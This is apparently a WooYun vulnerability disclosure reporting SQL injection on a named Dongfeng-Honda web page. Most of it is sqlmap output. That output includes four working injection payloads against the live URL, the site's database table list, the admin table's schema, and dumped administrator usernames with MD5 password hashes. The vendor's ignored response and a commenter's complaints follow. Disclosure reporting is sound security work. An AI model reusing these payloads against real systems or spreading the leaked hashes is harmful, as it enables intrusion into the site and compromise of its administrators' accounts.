    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
[54 tables]
+----------------------------+
| cd_2ws_order               |
| cd_2ws_ownerstory          |
| cd_admin                   |
| cd_admin_login             |
| cd_advanced                |
| cd_advanced_popedom        |
| cd_adver                   |
| cd_adver_page              |
| cd_attachment              |
| cd_ci_sessions             |
| cd_dream_dreams            |
| cd_dream_log               |
| cd_dream_log_zd            |
| cd_dream_randnum           |
| cd_dream_user              |
| cd_filestamp               |
| cd_group                   |
| cd_group_popedom           |
| cd_hd_userinfo             |
| cd_inquire                 |
| cd_link                    |
| cd_link_class              |
| cd_message                 |
| cd_message_state           |
| cd_news_class              |
| cd_news_info               |
| cd_reply                   |
| cd_rv_actinfo              |
| cd_rv_area                 |
| cd_rv_area_copy            |
| cd_rv_aream                |
| cd_rv_dealer               |
| cd_rv_dealer_insight       |
| cd_rv_userinfo             |
| cd_rv_userinfo_api         |
| cd_rv_userinfo_api_toexcel |
| cd_rv_userinfo_buy         |
| cd_rv_userinfo_elysion     |
| cd_rv_userinfo_m           |
| cd_rv_userinfo_mobile      |
| cd_rv_userinfo_pcenter     |
| cd_sp_log                  |
| cd_sp_user                 |
| cd_spirior_order           |
| cd_system_info             |
| cd_tags                    |
| cd_userinfo_api_ad         |
| cd_v_admin                 |
| cd_v_inbox                 |
| cd_v_news_class            |
| cd_v_rv_userinfo_api       |
| cd_v_rv_userinfo_m         |
| cdb_article                |
| cdb_article_copy           |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
Table: cd_admin
[21 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| answer        | varchar(50) |
| birthday      | varchar(10) |
| cardid        | varchar(18) |
| createTime    | int(11)     |
| email         | varchar(50) |
| group_id      | smallint(6) |
| id            | int(11)     |
| lastLoginIp   | int(11)     |
| lastLoginTime | int(11)     |
| loginCount    | int(11)     |
| mobile        | varchar(30) |
| modifyTime    | int(11)     |
| msn           | varchar(50) |
| name          | varchar(30) |
| pass          | varchar(32) |
| phone         | varchar(30) |
| posts         | varchar(50) |
| qq            | varchar(20) |
| question      | varchar(50) |
| realname      | varchar(50) |
| state         | tinyint(4)  |
+---------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
Database: honda_2hc
Table: cd_admin
[3 entries]
+---------+----------------------------------+
| name    | pass                             |
+---------+----------------------------------+
| admin   | cc03577bda0309a89498a1c7a58f3f62 |
| yangnan | 8e005e4bbecd53c1fa6f244d5b4af170 |
| jiahuan | 1eb2eb89d66acd6799084e07cda6a0f6 |
+---------+----------------------------------+


上个装逼图:

YQPK0E8IV5`F2E@IAG0BB_3.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价

  1. 2016-02-20 22:08 | SunnyDoll ( 实习白帽子 | Rank:63 漏洞数:20 | 职业搬砖工)

    @dongfeng-honda.com 准备忽略么?

  2. 2016-02-22 15:58 | SunnyDoll ( 实习白帽子 | Rank:63 漏洞数:20 | 职业搬砖工)

    @疯狗 @浩天 这种洞为何会忽略掉?

  3. 2016-02-22 15:59 | SunnyDoll ( 实习白帽子 | Rank:63 漏洞数:20 | 职业搬砖工)

    @dongfeng-honda.com 为毛会忽略掉? 我想知道... 没有威胁性?